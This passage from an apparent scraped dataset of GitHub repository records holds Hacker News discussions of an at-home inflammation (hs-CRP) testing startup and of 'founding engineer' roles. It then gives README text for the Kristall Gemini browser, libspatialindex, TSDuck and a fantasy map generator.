cells/etc faster than they can form into a hemorrhoid.Obviously, a compound that can do this could be potentially of use in modulating all sorts of other inflammatory processes \u2014 but it\u2019s critically under-researched, especially in chronic inflammation.I monitor my hs-crp quite regularly (multiple times a year).1. How is this different from a test you can order?2. hs-crp is quite variable, especially for people who are predisposed to inflammation. I really don't know if I can make any sense of it [1]. Given that the plans on your website (but not this HN post) suggest a lower frequency than my own testing, I'm a bit skeptical of this product (or service).> For example, you may get an insight like - you have had ginger 15 of the last 30 days and your inflammation levels are down 10%.You have no proven numbers or data, and you're just saying you MAY find a correlation. Have you published anything that validates the efficacy of your product, other than an experiment with N=1?[1]: Edit/Add - From your own tracking sheet, how can you tell whether the first 2.9mg/L in your graph is not an outlier, since that's when you started measuring and hs-crp can be elevated for a number of reasons (cold, flu, infection, sleep, stress)? Maybe your baseline hs-crp is ~1mg/L.Add: there is no doubt that fitness improves hs-crp. My hs-crp before the pandemic (when I was playing every day) - 1.4mg/L. 
After 2 years of inactivity: 5mg/L.There will be a lot of iterations and improvements to your approach and the methodology.Despite that, it is high time that low impact chronic conditions are treated in a personalized manner - by noting patient specific conditions and using the variations caused by lifestyle changes - for improvements.Kudos to the team. Absolutely the step in the right direction[1] https://www.nature.com/articles/s41591-019-0675-0, plus sources on this page: https://www.begolden.online/post/lifestyle-interventions-ass...[2] See the Nature article in [1] plus sources on this page: https://www.begolden.online/post/scientific-articles-on-the-...).[3] https://pubmed.ncbi.nlm.nih.gov/19223918/,https://academic.o..., https://pubmed.ncbi.nlm.nih.gov/17909397/[4] https://www.sciencedirect.com/topics/neuroscience/c-reactive..., https://www.nejm.org/doi/full/10.1056/nejm200003233421202, https://www.clevelandheartlab.com/wp-content/uploads/2020/04...[5] https://www.health.harvard.edu/staying-healthy/understanding...[6] https://www.nature.com/articles/s41591-019-0675-0, https://www.clinicaltherapeutics.com/article/S0149-2918%2819...[7] https://www.nature.com/articles/s41591-019-0675-0, https://www.health.harvard.edu/staying-healthy/understanding...[8] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC4369762/[9] https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/ ,https://www.mdpi.com/1422-0067/22/11/5421/htm, https://www.nature.com/articles/s41591-019-0675-0, https://www.cell.com/fulltext/S0092-8674(10)00060-7[10] https://www.nature.com/articles/s41392-021-00658-5, https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6831096/, https://www.mdpi.com/1422-0067/22/11/5421/htm[11] https://www.nature.com/articles/s41392-021-00658-5Do you provide any context on the normally expected day-to-day variability in CRP levels? I imagine that getting spot checks once a month would require a few years (or perhaps decades) if data before signal could be reliability differentiated from noise in a given individual.Have you established anything like this in pre-production testing? At least something as simple as \"make no intentional changes to your lifestyle and test monthly for a year,\" and then institute your recommended lifestyle changes and test for another year? If so, it would be helpful data to make available (in a loud way -- I admit I read your post but haven't perused the website yet).Are there interventions that lower CRP but have no effect (or negative effects) on health? I agree with other commenters regarding the problems of surrogate markers...Congrats on the launch! Coming from the longevity space, I am interested to know if your test is suitable to determine the efficacy of the following?1. Meat vs Vegan Diet2. Intermittent Fasting vs No FastingIt\u2019s great to see more companies focusing on inflammation. Is it possible to create a device like a continuous glucose monitor but for inflammation?Do you contract with a third party lab to analyze the samples? If so, can you share which one?This is very interesting. However, our lifestyle is not very linear, meaning that we can have some period more stressful than over. In this context, how do you deal with confounding variables ? \nFor example, if my inflammation levels decrease in the next few weeks, it might be because I took some ginger everyday but it might also be because I had a less work and therefore more sleep.This is a great idea, but the website could be so much better. I felt like I wanted to be taken on a journey, of what is this? 
why does it matter to me? how does it work? how can I get involved? what's the projects future?I love the idea, and so do many others, hence why Theranos was able to raise what it did, the idea of having insight into our own health is exciting, intriguing, and important.I wish you the best of luck on your journey, but I would definitely improve on the site, if you have the resources to do so.Just wondering why focussed on home-testing for 3-4x the price versus working with a central lab that is optimized for lowering their costs. Especially private lab chains might be interestes in additional business.\nThe focus could be rather on results tracking & interpretation that could be done for example from remote doctors for more rural areas.Source: Worked for a diagnostic company and later on added value service for personal healthcare records. Super interesting project you work on:).Congratulations on your launch! We've had a lot of inquiries about inflammation when we see our patients at Wyndly (https://www.wyndly.com), so it's good to know someone is thinking about making this process easy!Do they use their own lab tests or use a third party like Quest labs which also let you order your own tests.https://questdirect.questdiagnostics.com/products/crp-inflam....online is an interesting TLD choice.Ug, why no shipping to New York?Useful service, and tried adding two tests, but decided to not order when I saw:Recurring subtotal\n$268.00 every 12 monthsDo not know if it is useful enough to renew, and I as a customer do not like services that presumptively charge me on and on and moves the onus to the customer to get out of the charging cycle.Thanks, useful service, but not for me.Thehttps://www.begolden.online/post/lifestyle-interventions-ass...link is downConfused. Is it accurate that you are logging self-reported data daily, but only running diagnostic tests few times a year at roughly $100 a test depending on how many tests the end user commits to upfront? If so, with that combination of data, how is there any hope of meaningful analysis based individual specific observations?Congratulations on your launch! I apologize in advance for my ignorant questions, but here they go.How can we be certain that inflammation is causing problems rather than just being an indicator that something is wrong? As in, if we start directly lowering inflammation with some drug or whatever, how do we know that it's helping rather than just masking the problem? So if someone is obese and inactive, but they start eating ginger to reduce their inflammation markers, would that improve quality of life?I guess the best example(as someone that is completely ignorant on the topic) I can come up with is heart rate and exercise. We know that an elevated heart rate when exercising is good and provides benefits. But increasing the heart rate with caffeine does not provide the same benefits.Coming from software where I can use a debugger to examine \"exactly\" what is going on in a program and an ex hardware engineer where we had simulators/models that were \"pretty accurate\", medicine/healthcare looks insane. We cannot model the human body accurately nor can we observe in great detail the processes that go on. 
I'm pretty amazed medicine is as good as it is with those limitations.Following up from my comment 2 days ago https://news.ycombinator.com/item?id=32656651 > Some quick research shows these tests can be ordered by the patients, themselves, for ~$60, so the same as the disccounted/offer price here.\n\n > LabCorp: https://www.ondemand.labcorp.com/lab-tests/inflammation-hs-c...\n\n > Quest: https://questdirect.questdiagnostics.com/products/crp-inflam... \n\nI ordered the test the same day, got an appointment for blood draw the next day, and I have the results now, 2 days after this launch.From the launch text:> measuring your baseline inflammation levels using an at-home, finger prick based, blood testing kit, that includes a shipping label to send the sample back to the lab.For my self-ordered test, the lab took a whole vial of blood, as opposed to Be Golden's finger-prick method. But I'm sure I got the results faster than I would have, if I had used the mail-in kit and waited for the results.All in all, I think this a valuable test, and available at a reasonable cost.Good luck to Be Golden. I hope they can bring the cost lower, and increase the speed and frequency of the test results.I'm sitting in doctors office waiting for my appointment for an inflammation on my hand and I read this. What are the chances.cool. I'm writing from another country. Is is possible to have an access to the tool, but doing the hscrp test from here?This is a very appealing prospect and I'm sure you'll have no problem finding paying customers. The main question I can't help but ask is, how do I, or any potential customer for that matter, know that this isn't simply Theranos 2.0?Good luck Kimberly!Very interesting launch, congrats and good luck!Anecdotally, I've struggled with inflammation (joint pain, needing lots of NSAIDs, adult-onset food allergies), but my C Reactive Protein levels were normal when tested.Have you considered testing fo rother inflammatory markers that might help people like me?First: Congrats on attacking this space. I think there is all sorts of need in the self-managed care world.That said (you just knew there was going to be criticism :)> Overall, we recommend healthy lifestyle habits versus drugs to manage inflammation levels.Such a blanket recommendation strikes me as problematic: Which \"lifestyle habits\" handle the case where CRP is high due to things like (say) cancer? Or mold-toxicity? Or auto-immune issues?In constructing the company, I assume there is a general counsel talented in medical liability, which strikes me as a minefield. I also assume the very public history of Theranos is also going to invite interesting scrutiny, even though you're running a legitimate operation.Good luck to you in any case. Self-managed care should be an interesting space over the next decade imho.I preordered test kits. Looking forward to using it soon and seeing my results!Main advice from the blog is Curcumine, categorizing it as the most effective lifestyle change for bringing down inflammation. But, even though \"natural\", Curcumine is very strong and perhaps should be classified as a medicine.This might seem like nitpicking. But something with a strong effect on the body hardly every just has the effect you want it to have. 
By seeing it as a medicine it forces you to also look at the negative side effects of it's use over a long period.It's been known to help people with arthritis, but is it wise to use it on a daily basis as a healthy person?Even things as basic as muscle growth have been known to be suppressed by anti-inflammatory medicines like Ibuprophen. I wouldn't be surprised if Curcumine does the same. As well as indications that it might block proper immune responses to infections at times, but Im not sure about this.In general a lifestyle change in my opinion would be: sleep, exercise, stress, meditation, cutting out fried food etc.As someone with an auto-immune disorder, i've managed to reduce inflammation with diet changes, but it is always an ongoing battle against various triggers.Something like this would be great to help me monitor inflammation levels and correlate that data with lifestyle changes (did I eat gluten that week as a cheat? Did I have some milk or chocolate?)There's so many lifestyle changes I make that \"appear\" to reduce inflammation but there's no real way to monitor the effectiveness of those changes on inflammation markers.I know, for example, a primary trigger for me is a pet allergy that triggers a general immune response, which in-turn raises my baseline inflammation and then causes the auto-immune issues. One pet exposure and i'm a wreck for weeks.Being able to track this, and see if antihistamines impact the inflammation ect is helpful.My condition isn't serious enough to warrant immunosuppressive treatment, and heavy steroids are overkill.You can get a CRP level from any lab without a doctors order for about $30. The correct test, drawn and handled correctly, unlike this method.This is really cool, body inflammation plays a huge role in our lives.3 years ago I had a terrible case of atopic urticaria that lasted 9 months. My CRP was over 10 mg/dL.I started to make a handwritten habit diary to look for triggers. Food, type of exercises, exposure to temperatures, mood state, etc. Never pinpointed the issue, but I got better suddenly.Went deep into the body inflammation rabbit hole and found interesting papers on how it relates with depression. I truly believe that my acquaintances suffering from depression could benefit from tracking their CRP levels on a consistent basis and try to bring it down.Best of luck to the Be Golden team!Congratulations on launching.However as a potential customer interested in this space - I'm not sure the pricing/value prop is competitive for me. I used a service called InsideTracker (lab based blood test) earlier this year which measures 43 biomarkers (including hsCRP - my result was 0.4). I think I paid ~$500 for it but that gives a much more holistic view.Is there a case for tracking hsCRP more frequently if my lifestyle is relatively healthy? Are there a few other biomarkers you could include for tracking more regularly with a finger prick? I could see at-home tests being more convenient.I love all the new health monitoring startups.I recently tried documenting my glucose using one of the many startups using electronic patches that measure glucose every few minutes.What is the likelihood that a similar electronic patch would become available for inflammation in the industry?> Some of the ways we market to you include email campaigns, custom audiences advertising, and \u201cinterest-based\u201d or \u201cpersonalized advertising,\u201d including through cross-device tracking.> Advertising Partners. 
We may share your personal information with third-party advertising partners. These third-party advertising partners may set Technologies and other tracking tools on our Services to collect information regarding your activities and your device (e.g., your IP address, cookie identifiers, page(s) visited, location, time of day). These advertising partners may use this information (and similar information collected from other services) for purposes of delivering personalized advertisements to you when you visit digital properties within their networks. This practice is commonly referred to as \u201cinterest-based advertising\u201d or \u201cpersonalized advertising.\u201d APIs/SDKs. We may use third-party Application Program Interfaces (\u201cAPIs\u201d) and Software Development Kits (\u201cSDKs\u201d) as part of the functionality of our Services. For more information about our use of APIs and SDKs, please contact us as set forth in \u201cContact Us\u201d below.This is a bummer. Can no company exist without Facebook and Google Pixels?Being a researcher in social sciences, one thing that puzzles me of medicine is that a single timepoint analysis leads to major decisions. I understand you perform analyses every 1-2 months, is there data indicating that the sweet spot for maximising information from testing is there?This is like 10x the cost of other hsCRP tests you can take from home.Pretty hard to justify the cost differential.Also, going to a proper doctor and having a real blood test done once a year would cost way less than this.This gives me strong scam / nonsense vibes.Stupid question(s) for a non-medical person who doesn't even know enough to be wrong.I really thought \"inflammation\" is/was a generic term for a myriad of different causes and symptoms. Did something change and now we \"know\" that inflammation == c reactive protein? Or is this just one particular well-known marker of a common cluster of inflammation symptoms? Or am I just completely confused about the whole thing?happy to take answers from OP or others.This would be great for canker sores.I was first eng at 2 YC companies so can share my experience:Benefits:- Learn on the job- Learn to start companies/test ideasDrawbacks:- Company pivots or moves locations? Can lose all equity if < year 1 even if you stayed up late often building first MVP- All of your pointsThe payoff could be the startup, but more likely it's the experience and skills for down the line. Are you inexperienced? Then it's a great option if you want to start a startup in the future.For me I ended up getting a full time, much much better job by essentially going through the agile sprint wringer at multiple startups. It would be a much harder sell now to me, not that I'm not open to it, I just have more of a radar for better startups now.Caveat if you don't have the skills required to start the company, then there's no opportunity cost and the opportunity cost exists somewhere else if you have other skills. I did notice how several founders were very good at fundraising, instead of writing code -- and it was equally important. I was interested in this question too after seeing this post.The criterion for getting early funding from places like Ycombinator has changed substantially. The thinking used to be to find great teams including tech ability, invest in them very early, and let them pivot around until they find product-market fit.In the last few years, the model has shifted substantially. 
Now, it seems that incubators and early money investors expect you to already have a decent business idea, have it in some sort of production or beta cycle, and show actual revenue for a year or more before they're interested in risking their money.In practice, this skews the whole process in favor of people with a business and product focus. Frequently, I'm seeing MVPs that are built offshore by inexpensive teams, or even some of the no code solutions. Early funding is basically raid your saving account, and hit up your friends and family (or, be a repeat founder with a big win on your bio).\n,\nIf the mvp shows some traction, there suddenly needs to be some serious technical leadership, which is not the skill set of the founders. The founding engineer concept is an attempt to square this circle by giving enough equity to a talented tech lead to convince investors that you have the technical chops to chart a course over a few years and execute without a major catastrophe.As to the surprisingly low comp, here's the truth: Startup has become a glamour profession, equivalent to fashion or entertainment. You can pay poorly because there's a long line of people with the talent and ambition to try it out. The status boost you get by saying you're working at a Silicon Valley startup with white shoe VC investors is very valuable in some circles.If you want to make money, and you can cut it, do Faang. If you have a relatively low aversion to risk, and ambition to do big things and be important someday, take the plunge with startup, but don't fool yourself for a minute that it's a sure thing, no matter how smart you are. Hey, [name]! I think it's great that you're thinking about the role of the founding engineer.I think it's important to understand that a \"founding engineer\" is someone who has been with a company since its inception\u2014someone who has been instrumental in building and developing the product/service/company from the ground up. That doesn't mean they can't also be a co-founder, but I'd say that's not necessarily true. Founding engineers are usually the people who don't put their equity and their money is not at risk during the early stages that decide the fate of the company. But when they do own the risk, they are taken as founding member.It sounds like you're wondering whether or not the term \"founding engineer\" is trying to conflate the role of founder with much less of the benefit. Yes, there are definitely benefits to being a founder\u2014and things that come along with being one\u2014but I don't think those benefits apply to all founders. It really depends on what kind of business you're building and how much risk you're willing to take on as an entrepreneur.Previously:https://news.ycombinator.com/item?id=29783822Founder = worked on biz for months or years without salary. (If founders did have salaries then that\u2019s a different situation.) If you get to join an existing startup with a salary then you\u2019re basically post-founder stage, as the company already raised capital. Of course, that doesn\u2019t mean you couldn\u2019t get the title but your equity is likely going to be lower regardless.Founding engineer = first engineer but it\u2019s not clear yet what the long term role should be (eg CTO vs VP Eng). Sometimes it means the person is very junior and it\u2019s a wait and see type of situation. Sometimes it means it\u2019s not clear to the involved sheet things will head in terms of your work.At least that\u2019s how I\u2019ve been using them. 
If you joined my startup as a first engineer, then you can pick your title, but I would nudge you in the direction that makes sense. It often comes down to many CTO folks being architects and not active code writers. In an early startup that\u2019s not always ideal of course, why it\u2019s often better to start with a founding engineer title.If you think you\u2019re heading in the direction of being the future CTO, I think you should angle for 5%. My guess is they\u2019re not seeing you as that (eg if you\u2019re very junior), but your equity is def very strong for a non-CTO role IMHO.P.S.: the company valuation and your market comp determine your %. For example, if your market value is considered $200k and the company can afford to pay only a $100k salary then you\u2019d get $100k worth of equity.I agree with your sentiment. Can anyone suggest alternative solutions?How should founders hire early engineers who feel invested in the company?- offer more equity- offer more salary- offer the same position but with no \u201cfounding\u201d title. (Would your rather work the same position with no \u201cfounding\u201d title? Different title? \u201cFoundational engineer\u201d?)- get more co-founder engineers with 10%+ equityThe founding engineer's job is to lay down the foundation, take a small paycheck and then disappear from the scene. Those 2% are as good as two units of the startup's own currency that its owners can print in any quantity.To answer your question narrowly, some VC or incubator came up with this title. It would be interesting to trace the history, or maybe, maybe someone here is or knows the inventor of it.It simply means early employee and carries no other significance. It generally implies some technical seniority but I've seen this given to lower level or lower experienced folks as well. It's interesting that internally, if ranks (levels) are shared, that when the company reaches a hundred or hundreds of employees, the early engineers will be readily identifiable and perhaps command a certain respect or deference.I find it to be a form of title inflation, used to attract early employees.You are correct, that founders will have an order of magnitude more equity. But also, note that non-denominated plain ole \"engineers\" will have an order of magnitude less equity than founding engineers. Surely you must agree that they also carry nearly the same risk. As an employee earning startup market rate ($160-$180k) your risk is on par with those who come on at A or B rounds, so yes this is a sweet deal IMO, title inflation aside.In a very real way, your risk is actually much less than later employees, even series A. By that time, the equity is much more expensive to exercise. At \"founding engineer\" time, it's cheap enough that you don't even have to think about it. Just early exercise it.Getting the business and funding to pay your founding eng salary is a substantial amount of work and risk. Viewed a different way, you\u2019re getting a lot of the upside with almost zero risk.It's a midpoint between founder and engineer. You get low salary and low equity. But it's enough salary that you're not eating rice and beans and have the money for the occasional Steam sale. And presumably enough equity to retire once the company IPOs.You still share the high risk of failure, but the actual cost of failure is much lower.I mean... someone has to be the first employee or first technical employee. Everyone can't be a founder. 
I'm ignoring the term \"founding engineer\" because I also find it a bit disingenuous, and I consider that just a terminology fad.How do you decide how to balance that? YC/Silicon Valley has settled chiefly on near-market (~80%, it seems) rate salary and a much more significant stake (0.5-1.5%-ish, I guess) than later employees.The other factors that play into it, in my mind, are:* interested, but not ready to be a founder; by whatever definition they want to use* less \"feeling\" of risk as a 1st employee vs. actual risk (this one CAN'T be discounted. emotions are not rational)* wanting to have a much larger area of responsibility than they could at other companies* firmly believing in the company/founders/mission for whatever reasonThose seem to be the things that come up in every discussion I remember. Let me know if I missed anything obvious.The job title implies a lie and is a marketing ploy that will throw founder responsibilities and risk on a senior developer role.If you are not at the choosing the stack. If they insist on testing your technical abilities these raise red flags. Who is choosing the stack.. who is testing your technical abilities? The real founding engineer..", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "MasterQ32/kristall", "link": "https://github.com/MasterQ32/kristall", "tags": ["gemini-protocol", "browser", "qt5", "qt5-gui", "gopher", "gopher-client", "gopher-protocol", "finger", "finger-protocol"], "stars": 639, "description": "Graphical small-internet client for windows, linux, MacOS X and BSDs. Supports gemini, http, https, gopher, finger.", "lang": "C++", "repo_lang": "", "readme": "# Kristall\nA high-quality visual cross-platform gemini browser.\n\n![Preview Image](https://mq32.de/public/336ac416892fd9064593631e7be9f7d8e266196b.png)\n\n## Features\n- Multi-protocol support\n - [Gemini](https://gemini.circumlunar.space/)\n - HTTP\n - HTTPS\n - [Finger](https://tools.ietf.org/html/rfc1288)\n - [Gopher](https://tools.ietf.org/html/rfc1436)\n- Document rendering\n - `text/gemini`\n - `text/html` (reduced feature set)\n - `text/markdown`\n - `text/*`\n - `image/*`\n - `video/*`\n - `audio/*`\n- TLS Management\n - Supports client certificates\n - Supports TOFU and CA TLS handling for both Gemini and HTTPS\n- [Outline generation](https://mq32.de/public/a50ef327f4150d870393b1989c5b41db495b56f7.png) ([Video](https://mq32.de/public/kristall-02.mp4))\n- Favourite Sites\n- Navigation history\n- Tabbed interface\n- Survives [ConMans torture suite](gemini://gemini.conman.org/test/torture/) as well as the [Egsam Torture Suite](gemini://egsam.pitr.ca/)\n- [Special link highlighting for different targets](https://mq32.de/public/92f3ec7a64833d01f1ed001d15c8db4158e5d3c2.png)\n- Color Themes\n - Custom document color theme\n - [Automatic light/dark theme based on the host name](https://mq32.de/public/kristall-01.mp4)\n - Dark/Light UI theme\n- Crossplatform supports\n - Linux\n - Windows\n - FreeBSD\n - NetBSD\n - OpenBSD\n - macOS\n - Haiku\n\n## Screenshots\n\n### Generates Outlines\n\n![Outline Generation](https://mq32.de/public/a50ef327f4150d870393b1989c5b41db495b56f7.png)\n\n### Fully Customizable Site Theme\n\n![Site Theme](https://mq32.de/public/7123e22a58969448c27b24df8510f4d56921bf23.png)\n\n## Build/Install Instructions\n\n**Note:** `master` branch is the latest development status (sometimes called \"nightly\") whereas the tagged versions are the stable releases.\n\nIf you want to build a stable experience, check out the latest 
version and build that!\n\nSee [BUILDING.md](BUILDING.md)\n\n## Credits\n\n- Thanks to [James Tomasino](https://tomasino.org) for helping out with understanding gopher\n- Thanks to [Vane Vander](https://mayvaneday.art/) for providing the Haiku build instructions\n- Thanks to James Tomasino, styan and tiwesdaeg for improving the `Makefile`\n- Thanks to [Alex Naskos](https://github.com/alexnask) for providing windows build instructions\n- Thanks to tiwesdaeg for improving the application icon\n\n## Changelog\n\nSee [src/about/updates.gemini](src/about/updates.gemini)\n\n## Roadmap\n\nSee [ROADMAP.md](ROADMAP.md)\n\n## License\n\nKristall is released under the GPLv3 or (at your option) any later version.\n[See LICENSE as well](LICENSE)\n", "readme_type": "markdown", "hn_comments": "For gemini I use either castor[0] or dragonstone[1]. Both are quite good, dragonstone even has tabs.Both are written for GTK, so they integrate quite good with GNOME.[0]: https://git.sr.ht/~julienxx/castor[1]: https://gitlab.com/baschdel/dragonstoneThis looks seriously cool.I might install it in a VM like Palemoon (because security) and try use it as a main non-work browser to see how it fares.IMO the world badly needs a truly independent browser.Another excellent client is Lagrange: https://gmi.skyjake.fi/lagrange/What can I do with Gopher and Finger? (isn't Gopher also a Haskell like programming lang?)It seems based on Qt for cross-platform ui graphical toolkit, without surprise, nowadays people seem to have settlers on this (understandably)That's nice! But since it's also for Windows, I was surprised not to see binary releases, just the source. Most Windows users won't bother compiling from source.Edit: Found on the project page: https://kristall.random-projects.net/Original title was \"Graphical small-internet client\", like the Github page title. Moderator changd it.If you'd like to learn more about the Gemini Protocol, head to https://geminiquickst.art/And if you're more partial to terminal browsers, I've written my own. https://github.com/makeworld-the-better-one/amforaKristall is good, but Lagrange is more finished, imho. But the great thing about Gemini is that it is possible to write a fully featured Gemini browser in a weekend, so there are plenty about. Just try writing your own Web browser with anything less than a couple-billion dollars handy. Even Microsoft gave up.https://news.ycombinator.com/item?id=29291392Does this have its own original html renderer? That's really cool.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "libspatialindex/libspatialindex", "link": "https://github.com/libspatialindex/libspatialindex", "tags": ["c-plus-plus", "spatial-indexing"], "stars": 638, "description": "C++ implementation of R*-tree, an MVR-tree and a TPR-tree with C API", "lang": "C++", "repo_lang": "", "readme": ".. image:: https://dev.azure.com/hobuinc/libspatialindex/_apis/build/status/libspatialindex.libspatialindex?branchName=master\n\n*****************************************************************************\n libspatialindex\n*****************************************************************************\n\n\n:Author: Marios Hadjieleftheriou\n:Contact: mhadji@gmail.com\n:Revision: 1.9.3\n:Date: 10/23/2019\n\nSee http://libspatialindex.org for full documentation.\n\n.. 
image:: https://readthedocs.org/projects/libspatialindex/badge/?version=latest\n :target: https://libspatialindex.org/en/latest/?badge=latest\n :alt: Documentation Status\n", "readme_type": "rst", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tsduck/tsduck", "link": "https://github.com/tsduck/tsduck", "tags": ["mpeg", "dvb", "mpeg-ts", "dvb-ip", "dvb-si", "dvb-psi", "teletext", "dvb-t2-mi", "dvb-simulcrypt", "hls", "atsc", "digital-tv", "srt", "isdb", "arib", "epg", "rist", "scte-35", "dektec", "vatek"], "stars": 638, "description": "MPEG Transport Stream Toolkit ", "lang": "C++", "repo_lang": "", "readme": "## TSDuck - The MPEG Transport Stream Toolkit\n\n### Abstract\n\n[TSDuck](https://tsduck.io/) is an extensible toolkit for MPEG transport streams.\n\nTSDuck is used in digital television systems for test, monitoring, integration, debug, lab or demo purposes.\n\nIn practice, TSDuck is used to:\n\n- Acquire or transmodulate transport streams, including DVB, ATSC, ISDB, ASI and IP multicast.\n- Analyze transport streams, PSI/SI signalization, bitrates, timestamps.\n- Monitor and report conditions on the stream (video and audio properties, bitrates, crypto-periods, signalization).\n- Transform or inject content and signalization on the fly.\n- Modify, remove, rename and extract services.\n- Work on live transport streams (DVB-S/C/T, ATSC, ISDB-T, ASI, UDP \"IP-TV\", HTTP, HLS, SRT, RIST) or on offline transport stream files.\n- Use specialized hardware such as cheap DVB, ATSC or ISDB tuners (USB, PCI), professional Dektec devices, cheap HiDes modulators, VATek-based modulators (e.g. Suntechtv U3, USB).\n- Re-route transport streams to other applications.\n- Extract or inject Multi-Protocol Encapsulation (MPE) between TS and UDP/IP.\n- Analyze and inject SCTE 35 splice information.\n- Extract specific encapsulated data (Teletext, T2-MI).\n- Emulate a CAS head-end using DVB SimulCrypt interfaces to and from ECMG or EMMG.\n- And more...\n\nTSDuck is developed in C++ in a modular architecture. It is easy to extend\nthrough plugins.\n\nTSDuck is simple; it is a collection of command line tools and plugins. There is\nno sophisticated GUI. Each utility or plugin performs only one elementary feature,\nbut they can be combined in any order.\n\nThrough `tsp`, the Transport Stream Processor, many types of analysis and\ntransformation can be applied to live or recorded transport streams.\nThis utility can be extended through plugins. Existing plugins can be\nenhanced and new plugins can be developed using a library of C++ classes.\n\n### Usage\n\nTSDuck comes with a comprehensive [User's Guide](https://tsduck.io/download/docs/tsduck.pdf).\n\nAll utilities and plugins accept the option `--help` to display their syntax.\n
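\nAs an illustration of chaining plugins, a hypothetical `tsp` pipeline might look like the sketch below. The plugin names (`file`, `zap`, `continuity`, `ip`) are real, but the file name, service name and addresses are illustrative; check `tsp --help` and the User's Guide for the exact options:\n\n```\n# Read a recorded stream, extract one service, check continuity\n# counters, then re-send the result as UDP multicast.\ntsp -I file input.ts -P zap \"MyService\" -P continuity -O ip 230.2.3.4:4000\n```\n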
\nFor programmers, TSDuck provides a large collection of C++ classes in one single library.\nThese classes manipulate, in a completely portable way, MPEG transport streams, MPEG/DVB/ATSC/ISDB\nsignalization and many other features. See the [programming guide](https://tsduck.io/doxy/)\nand its [tutorial](https://tsduck.io/doxy/libtutorial.html).\n\nPython and Java bindings exist to allow running transport stream processing pipelines from\nPython or Java applications.\n\n### Building\n\nTSDuck can be built on Windows, Linux, macOS and BSD systems (FreeBSD, OpenBSD, NetBSD, DragonFlyBSD).\nSee the [building guide](https://tsduck.io/doxy/building.html) for details.\n\n### Download\n\nPre-built [binary packages](https://github.com/tsduck/tsduck/releases) are available\nfor Windows and the very latest versions of some Linux distros\n(Fedora, RedHat, CentOS, AlmaLinux, Ubuntu, Debian, Raspbian).\nOn macOS, [use the Homebrew packager](https://tsduck.io/doxy/installing.html#macinstall).\n\nThe latest developments can be tested using [nightly builds](https://tsduck.io/download/prerelease/).\n\nThe command `tsversion --check` can be used to check if a new version of TSDuck is available\nonline. The command `tsversion --upgrade` downloads the latest binaries for the current\noperating system and upgrades TSDuck.\n\n### Project resources\n\nTSDuck is maintained by a single developer in his spare time and at his own expense.\nYou may consider [contributing](https://tsduck.io/donate/) to the hardware and Web hosting costs\nusing [![Donate](https://tsduck.io/images/donate-paypal.svg)](https://tsduck.io/donate/)\n\n### License\n\nTSDuck is distributed under the terms of the Simplified BSD License.\nSee the file `LICENSE.txt` for details.\n\n*Copyright (c) 2005-2023, Thierry Lelegard*
\n*All rights reserved*\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rlguy/FantasyMapGenerator", "link": "https://github.com/rlguy/FantasyMapGenerator", "tags": ["procedural-generation", "erosion", "map-generation"], "stars": 638, "description": "A fantasy map generator based on Martin O'Leary's \"Generating fantasy map\" notes", "lang": "C++", "repo_lang": "", "readme": "# Fantasy Map Generator\n\nThis program is an implementation of a fantasy map generator written in C++, based on the methods described in Martin O'Leary's \"Generating fantasy map\" notes (https://mewo2.com/notes/terrain/).\n\nThis project uses [jsoncons](https://github.com/danielaparker/jsoncons) for parsing JSON data, [Argtable3](http://www.argtable.org/) for parsing command line arguments, [Python](https://www.python.org/) and [PyCairo](https://cairographics.org/pycairo/) for drawing, and data from [GeoNames](http://www.geonames.org/) for city name data.\n\nThe project page and generation notes are also available here: [http://rlguy.com/map_generation](http://rlguy.com/map_generation)\n\n[![alt tag](http://rlguy.com/map_generation/images/example_small.jpg)](http://rlguy.com/map_generation/images/example_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery00_small.jpg)](http://rlguy.com/map_generation/images/gallery00_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery01_small.jpg)](http://rlguy.com/map_generation/images/gallery01_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery02_small.jpg)](http://rlguy.com/map_generation/images/gallery02_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery03_small.jpg)](http://rlguy.com/map_generation/images/gallery03_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery05_small.jpg)](http://rlguy.com/map_generation/images/gallery05_large.jpg)\n\n[![alt tag](http://rlguy.com/map_generation/images/gallery04_small.jpg)](http://rlguy.com/map_generation/images/gallery04_large.jpg)\n\n# Dependencies\n\nThree dependencies are required to build this program:\n\n1. Python 2.7+\n2. PyCairo graphics library (https://cairographics.org/pycairo/)\n3. A compiler that supports C++11\n\n## Installing PyCairo on Windows\n\nPrebuilt Windows binaries for PyCairo and its dependencies can be obtained by following [this guide on installing igraph](http://www.cs.rhul.ac.uk/home/tamas/development/igraph/tutorial/install.html), which uses PyCairo for drawing. The relevant section is titled \"Graph plotting in igraph on Windows\".\n\nTo check if PyCairo was installed correctly, try importing the module within the Python interpreter:\n\n```\nimport cairo\n```\n\n# Installation\n\nThis program uses the [CMake](https://cmake.org/) utility to generate the appropriate solution, project, or Makefiles for your system. The following commands can be executed in the root directory of the project to generate a build system for your machine:\n\n```\nmkdir build && cd build\ncmake ..\n```\n\nThe first line creates a new directory named ```build``` and changes the working directory to the newly created build directory. The second line runs the CMake utility and passes it the parent directory, which contains the ```CMakeLists.txt``` file.\n\nThe type of build system generated by CMake can be specified with the ```-G [generator]``` parameter. For example:\n\n```\ncmake .. 
